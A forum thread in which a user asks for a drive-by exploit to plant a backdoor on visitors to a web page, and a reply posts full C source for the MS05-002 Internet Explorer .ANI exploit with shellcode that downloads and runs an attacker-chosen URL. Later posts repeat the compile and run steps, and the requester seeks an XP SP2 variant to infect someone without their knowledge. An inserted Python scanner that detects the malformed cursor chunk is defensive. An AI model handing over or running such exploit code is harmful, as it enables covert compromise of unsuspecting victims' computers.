A 'small' request.

qw3rt^

User
Joined
April 21, 2007
Posts
20
Could someone give me some exploit that creates an html file and, when someone visits the page with that file, downloads something I specify beforehand, e.g. a backdoor?
I tried something with the .ani file downloader etc. but nothing from that works - oh, and could someone write me some simple instructions?? Because when I type e.g.
cd c:\explity
then aniexplo.exe www.strona.com/backdoor.exe
it creates an html file for me, then I put it on the server - the victim visits the page but nothing gets downloaded ;/
(Sorry for such a question, but I really haven't found anything that works).

31337

Guest
/* Modified by Vertygo aka Ivanm ([email protected]) all credits goes to
houseofdabus Berend-Jan Wever and to milw0rm*/
/* Added string.h /str0ke */
/* HOD-ms05002-ani-expl.c: 2005-01-10: PUBLIC v.0.2
*
* Copyright © 2004-2005 houseofdabus.
*
* (MS05-002) Microsoft Internet Explorer .ANI Files Handling Exploit
* (CAN-2004-1049)
*
*
*
* .::[ houseofdabus ]::.
*
*
*
* (universal -- for all affected systems)
* ---------------------------------------------------------------------
* Description:
* A remote code execution vulnerability exists in the way that
* cursor, animated cursor, and icon formats are handled. An attacker
* could try to exploit the vulnerability by constructing a malicious
* cursor or icon file that could potentially allow remote code
* execution if a user visited a malicious Web site or viewed a
* malicious e-mail message. An attacker who successfully exploited
* this vulnerability could take complete control of an affected
* system.
*
* ---------------------------------------------------------------------
* Patch:
* http://www.microsoft.com/technet/security/...n/MS05-002.mspx
*
* ---------------------------------------------------------------------
* Tested on:
* - Windows Server 2003
* - Windows XP SP1
* - Windows XP SP0
* - Windows 2000 SP4
* - Windows 2000 SP3
* - Windows 2000 SP2
*
* ---------------------------------------------------------------------
* Compile:
*
* Win32/VC++ : cl -o HOD-ms05002-ani-expl HOD-ms05002-ani-expl.c
* Win32/cygwin: gcc -o HOD-ms05002-ani-expl HOD-ms05002-ani-expl.c
* Linux : gcc -o HOD-ms05002-ani-expl HOD-ms05002-ani-expl.c
*
* ---------------------------------------------------------------------
* Example:
*
* C:\>HOD-ms05002-ani-expl.exe poc 7777
* <...>
* [*] Creating poc.ani file ... Ok
* [*] Creating poc.html file ... Ok
*
* C:\>
*
* start IE -> C:\poc.html
*
* C:\>telnet localhost 7777
* Microsoft Windows 2000 [Version 5.00.2195]
* © Copyright 1985-2000 Microsoft Corp.
*
* C:\Documents and Settings\Administrator\Desktop>
*
* ---------------------------------------------------------------------
*
* This is provided as proof-of-concept code only for educational
* purposes and testing by authorized individuals with permission to
* do so.
*
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* ANI header: "RIFF" <size> "ACON" "anih" <chunk length 0x37c> then the
   36-byte ANIHEADER fields (cbSizeof = 0x24, cFrames = 8, cSteps = 8, ...) */
unsigned char aniheader[] =
"\x52\x49\x46\x46\x9c\x18\x00\x00\x41\x43\x4f\x4e\x61\x6e\x69\x68"
"\x7c\x03\x00\x00\x24\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

/* jmp offset, no Jitsu */
"\x77\x82\x40\x00\xeb\x64\x90\x90\x77\x82\x40\x00\xeb\x64\x90\x90"
"\xeb\x54\x90\x90\x77\x82\x40\x00\xeb\x54\x90\x90\x77\x82\x40\x00"
"\xeb\x44\x90\x90\x77\x82\x40\x00\xeb\x44\x90\x90\x77\x82\x40\x00"
"\xeb\x34\x90\x90\x77\x82\x40\x00\xeb\x34\x90\x90\x77\x82\x40\x00"
"\xeb\x24\x90\x90\x77\x82\x40\x00\xeb\x24\x90\x90\x77\x82\x40\x00"
"\xeb\x14\x90\x90\x77\x82\x40\x00\xeb\x14\x90\x90\x77\x82\x40\x00"
"\x77\x82\x40\x00\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";

/* portbind shellcode */
unsigned char shellcode[] =
"\xEB\x0F\x58\x80\x30\x17\x40\x81\x38\x6D\x30\x30\x21\x75\xF4"
"\xEB\x05\xE8\xEC\xFF\xFF\xFF\xFE\x94\x16\x17\x17\x4A\x42\x26"
"\xCC\x73\x9C\x14\x57\x84\x9C\x54\xE8\x57\x62\xEE\x9C\x44\x14"
"\x71\x26\xC5\x71\xAF\x17\x07\x71\x96\x2D\x5A\x4D\x63\x10\x3E"
"\xD5\xFE\xE5\xE8\xE8\xE8\x9E\xC4\x9C\x6D\x2B\x16\xC0\x14\x48"
"\x6F\x9C\x5C\x0F\x9C\x64\x37\x9C\x6C\x33\x16\xC1\x16\xC0\xEB"
"\xBA\x16\xC7\x81\x90\xEA\x46\x26\xDE\x97\xD6\x18\xE4\xB1\x65"
"\x1D\x81\x4E\x90\xEA\x63\x05\x50\x50\xF5\xF1\xA9\x18\x17\x17"
"\x17\x3E\xD9\x3E\xE0\xFE\xFF\xE8\xE8\xE8\x26\xD7\x71\x9C\x10"
"\xD6\xF7\x15\x9C\x64\x0B\x16\xC1\x16\xD1\xBA\x16\xC7\x9E\xD1"
"\x9E\xC0\x4A\x9A\x92\xB7\x17\x17\x17\x57\x97\x2F\x16\x62\xED"
"\xD1\x17\x17\x9A\x92\x0B\x17\x17\x17\x47\x40\xE8\xC1\x7F\x13"
"\x17\x17\x17\x7F\x17\x07\x17\x17\x7F\x68\x81\x8F\x17\x7F\x17"
"\x17\x17\x17\xE8\xC7\x9E\x92\x9A\x17\x17\x17\x9A\x92\x18\x17"
"\x17\x17\x47\x40\xE8\xC1\x40\x9A\x9A\x42\x17\x17\x17\x46\xE8"
"\xC7\x9E\xD0\x9A\x92\x4A\x17\x17\x17\x47\x40\xE8\xC1\x26\xDE"
"\x46\x46\x46\x46\x46\xE8\xC7\x9E\xD4\x9A\x92\x7C\x17\x17\x17"
"\x47\x40\xE8\xC1\x26\xDE\x46\x46\x46\x46\x9A\x82\xB6\x17\x17"
"\x17\x45\x44\xE8\xC7\x9E\xD4\x9A\x92\x6B\x17\x17\x17\x47\x40"
"\xE8\xC1\x9A\x9A\x86\x17\x17\x17\x46\x7F\x68\x81\x8F\x17\xE8"
"\xA2\x9A\x17\x17\x17\x44\xE8\xC7\x48\x9A\x92\x3E\x17\x17\x17"
"\x47\x40\xE8\xC1\x7F\x17\x17\x17\x17\x9A\x8A\x82\x17\x17\x17"
"\x44\xE8\xC7\x9E\xD4\x9A\x92\x26\x17\x17\x17\x47\x40\xE8\xC1"
"\xE8\xA2\x86\x17\x17\x17\xE8\xA2\x9A\x17\x17\x17\x44\xE8\xC7"
"\x9A\x92\x2E\x17\x17\x17\x47\x40\xE8\xC1\x44\xE8\xC7\x9A\x92"
"\x56\x17\x17\x17\x47\x40\xE8\xC1\x7F\x12\x17\x17\x17\x9A\x9A"
"\x82\x17\x17\x17\x46\xE8\xC7\x9A\x92\x5E\x17\x17\x17\x47\x40"
"\xE8\xC1\x7F\x17\x17\x17\x17\xE8\xC7\xFF\x6F\xE9\xE8\xE8\x50"
"\x72\x63\x47\x65\x78\x74\x56\x73\x73\x65\x72\x64\x64\x17\x5B"
"\x78\x76\x73\x5B\x7E\x75\x65\x76\x65\x6E\x56\x17\x41\x7E\x65"
"\x63\x62\x76\x7B\x56\x7B\x7B\x78\x74\x17\x48\x7B\x74\x65\x72"
"\x76\x63\x17\x48\x7B\x60\x65\x7E\x63\x72\x17\x48\x7B\x74\x7B"
"\x78\x64\x72\x17\x40\x7E\x79\x52\x6F\x72\x74\x17\x52\x6F\x7E"
"\x63\x47\x65\x78\x74\x72\x64\x64\x17\x40\x7E\x79\x5E\x79\x72"
"\x63\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x58\x67\x72\x79\x56"
"\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x58\x67\x72\x79\x42\x65"
"\x7B\x56\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x45\x72\x76\x73"
"\x51\x7E\x7B\x72\x17\x17\x17\x17\x17\x17\x17\x17\x17\x7A\x27"
"\x27\x39\x72\x6F\x72\x17"
"m00!";

//#define SET_PORTBIND_PORT(buf, port) *(unsigned short *)(((buf)+300)) = (port)

unsigned char discl[] =
"This is provided as proof-of-concept code only for educational"
" purposes and testing by authorized individuals with permission"
" to do so.";

/* HTML wrapper: the first %s receives discl, the second the base file name
   of the .ani file, which the style sheet loads as the page cursor */
unsigned char html[] =
"<html>\n"
"(MS05-002) Microsoft Internet Explorer .ANI Files Handling Exploit"
"<br>Copyright © 2004-2005 .: houseofdabus :.<br><a href =\""
"http://www.microsoft.com/technet/security/Bulletin/MS05-002.mspx\">"
"Patch (MS05-002)</a>\n"
"<script>alert(\"%s\")</script>\n<head>\n\t<style>\n"
"\t\t* {CURSOR: url(\"%s.ani\")}\n\t</style>\n</head>\n"
"</html>";

/* byte-swap a 16-bit value (left over from the original portbind variant) */
unsigned short
fixx(unsigned short p)
{
unsigned short r = 0;
r = (p & 0xFF00) >> 8;
r |= (p & 0x00FF) << 8;

return r;
}

void
usage(char *prog)
{
printf("Usage:\n");
printf("%s <file> <url to file>\n\n", prog);
printf("eg: %s index http://www.blic.net/proggy.exe\n\n", prog);
exit(0);
}

int
main(int argc, char **argv)
{
FILE *fp;
unsigned short port;
unsigned char f[256+5] = "";
unsigned char anib[912] = "";

unsigned char newshellcode[686];

printf("\n(MS05-002) Microsoft Internet Explorer .ANI Files Handling Exploit\n\n");
printf("\tCopyright © 2004-2005 .: houseofdabus :.\n\n\n");
printf("\tModified by Vertygo ([email protected])\n\n\n");

printf("%s\n\n", discl);
if ( (sizeof(shellcode)-1) > (912-sizeof(aniheader)-3) ) {
printf("[-] Size of shellcode must be <= 686 bytes\n");
return 0;
}
if (argc < 3) usage(argv[0]);

if (strlen(argv[1]) > 256) {
printf("[-] Size of filename must be <=256 bytes\n");
return 0;
}

/* the URL is appended to the shellcode inside newshellcode[686]; the
   original had no bound on it, so a long URL overran the buffer */
if (sizeof(shellcode) + strlen(argv[2]) + 1 > sizeof(newshellcode)) {
printf("[-] URL too long: shellcode plus URL must fit in %u bytes\n",
(unsigned)sizeof(newshellcode));
return 0;
}

/* creating ani file */
strcpy(f, argv[1]);
strcat(f, ".ani");
printf("[*] Creating %s file ...", f);
fp = fopen(f, "wb");
if (fp == NULL) {
printf("\n[-] error: can't create file: %s\n", f);
return 0;
}

/* NOP-fill the whole buffer so no uninitialised stack bytes reach the file */
memset(newshellcode,0x90,sizeof(newshellcode));
strcpy(newshellcode,shellcode);
strcat(newshellcode,argv[2]);
strcat(newshellcode,"\x01");
memset(anib, 0x90, 912);
memcpy(anib, aniheader, sizeof(aniheader)-1);
memcpy(anib+sizeof(aniheader)-1, newshellcode, sizeof(newshellcode)-1);
fwrite(anib, 1, 912, fp);
printf(" Ok\n");
fclose(fp);
f[0] = '\0';
strcpy(f, argv[1]);
strcat(f, ".html");
printf("[*] Creating %s file ...", f);
fp = fopen(f, "wb");
if (fp == NULL) {
printf("\n[-] error: can't create file: %s\n", f);
return 0;
}
sprintf(anib, html, discl, argv[1]);
fwrite(anib, 1, strlen(anib), fp);
printf(" Ok\n");
fclose(fp);

return 0;
}

// milw0rm.com [2005-01-24]
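Defender-side note, added here; this is not part of the thread or of the houseofdabus/Vertygo code above. The header the program writes declares its "anih" chunk as 0x37c (892) bytes while the ANIHEADER structure such a chunk is supposed to carry is 36 bytes (and the first field inside the chunk, cbSizeof, still says 36). That disagreement is the MS05-002 condition, and it is what a file scanner or mail-gateway check can key on. The Python below walks the top-level RIFF chunks of a .ani file and reports that mismatch plus the truncation inconsistencies that usually accompany it. The two sample byte strings are constructed for the example, not taken from real cursor files.

```python
import struct
import sys

# sizeof(ANIHEADER): the fixed-size structure a well-formed "anih" chunk carries.
# The exploit header above declares 0x37c (892) bytes in the chunk length field.
ANIH_STRUCT_SIZE = 36


def scan_ani(data: bytes) -> list:
    """Walk the top-level RIFF chunks of an .ani file and return a list of
    findings; an empty list means nothing suspicious was seen."""
    findings = []
    if len(data) < 12 or data[:4] != b"RIFF" or data[8:12] != b"ACON":
        return ["not a RIFF/ACON animated cursor"]

    riff_len = struct.unpack_from("<I", data, 4)[0]
    if riff_len + 8 > len(data):
        findings.append(f"RIFF length {riff_len} exceeds file size {len(data)}")

    pos, saw_anih = 12, False
    while pos + 8 <= len(data):
        cid = data[pos:pos + 4]
        clen = struct.unpack_from("<I", data, pos + 4)[0]
        body = pos + 8
        if cid == b"anih":
            saw_anih = True
            if clen != ANIH_STRUCT_SIZE:
                findings.append(
                    f"anih chunk declares {clen} bytes, expected {ANIH_STRUCT_SIZE}")
            if body + 4 <= len(data):
                # First ANIHEADER field is cbSizeof; the patched loader rejects
                # a chunk whose length field disagrees with it.
                cb = struct.unpack_from("<I", data, body)[0]
                if cb != clen:
                    findings.append(
                        f"anih cbSizeof={cb} disagrees with chunk length {clen}")
        if body + clen > len(data):
            findings.append(f"chunk {cid!r} at offset {pos} runs past end of file")
            break
        pos = body + clen + (clen & 1)   # RIFF pads odd-length chunks to even size

    if not saw_anih:
        findings.append("no anih chunk found")
    return findings


# Constructed samples (assumption: minimal files, no frame data) for offline use.
BENIGN_ANI = (
    b"RIFF" + struct.pack("<I", 48) + b"ACON"
    + b"anih" + struct.pack("<I", ANIH_STRUCT_SIZE)
    # cbSizeof, cFrames, cSteps, cx, cy, cBitCount, cPlanes, JifRate, flags
    + struct.pack("<9I", 36, 1, 1, 0, 0, 0, 0, 10, 1)
)

SUSPICIOUS_ANI = (
    b"RIFF" + struct.pack("<I", 0x189C) + b"ACON"
    + b"anih" + struct.pack("<I", 0x37C)      # 892 bytes declared, not 36
    + struct.pack("<9I", 36, 8, 8, 0, 0, 0, 0, 0, 0)
)


if __name__ == "__main__":
    # Usage: python ani_check.py file1.ani [file2.ani ...]
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            for finding in scan_ani(fh.read()) or ["clean"]:
                print(f"{path}: {finding}")
```

The check is deliberately structural rather than signature-based: it does not look for the NOP sled or the shellcode bytes, so a re-encoded payload with the same oversized chunk is still reported, and a cursor whose chunk length matches its cbSizeof passes regardless of what else it contains.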
 

qw3rt^

User
Joined
April 21, 2007
Posts
20
Thanks, but it doesn't work on WinXP SP2.

Does anyone have a different one?

Oh, and next time could I ask for at least a short set of instructions?
 

D0han

Former Moderator
Joined
July 27, 2005
Posts
975
* ---------------------------------------------------------------------
* Compile:
*
* Win32/VC++ : cl -o HOD-ms05002-ani-expl HOD-ms05002-ani-expl.c
* Win32/cygwin: gcc -o HOD-ms05002-ani-expl HOD-ms05002-ani-expl.c
* Linux : gcc -o HOD-ms05002-ani-expl HOD-ms05002-ani-expl.c
*
* ---------------------------------------------------------------------
* Example:
*
* C:\>HOD-ms05002-ani-expl.exe poc 7777
* <...>
* [*] Creating poc.ani file ... Ok
* [*] Creating poc.html file ... Ok
*
* C:\>
*
* start IE -> C:\poc.html
*
* C:\>telnet localhost 7777
* Microsoft Windows 2000 [Version 5.00.2195]
* © Copyright 1985-2000 Microsoft Corp.
*
* C:\Documents and Settings\Administrator\Desktop>
*
* ---------------------------------------------------------------------
The instructions are right there.
 

qw3rt^

User
Joined
April 21, 2007
Posts
20
Except that it doesn't work. Do you have anything for Service Pack 2?? So I can send someone a backdoor without their knowledge ;] without sending them files! Or possibly some link to a page, but not to a file!
 

harrie

User
Joined
April 15, 2007
Posts
19
Originally posted by D0han:
* ---------------------------------------------------------------------
* Compile:
*
* Win32/VC++ : cl -o HOD-ms05002-ani-expl HOD-ms05002-ani-expl.c
* Win32/cygwin: gcc -o HOD-ms05002-ani-expl HOD-ms05002-ani-expl.c
* Linux : gcc -o HOD-ms05002-ani-expl HOD-ms05002-ani-expl.c
*
* ---------------------------------------------------------------------
* Example:
*
* C:\>HOD-ms05002-ani-expl.exe poc 7777
* <...>
* [*] Creating poc.ani file ... Ok
* [*] Creating poc.html file ... Ok
*
* C:\>
*
* start IE -> C:\poc.html
*
* C:\>telnet localhost 7777
* Microsoft Windows 2000 [Version 5.00.2195]
* © Copyright 1985-2000 Microsoft Corp.
*
* C:\Documents and Settings\Administrator\Desktop>
*
* ---------------------------------------------------------------------
The instructions are right there.
So I compile it and run it in cmd,
then I'm supposed to run it and connect to it with telnet?
 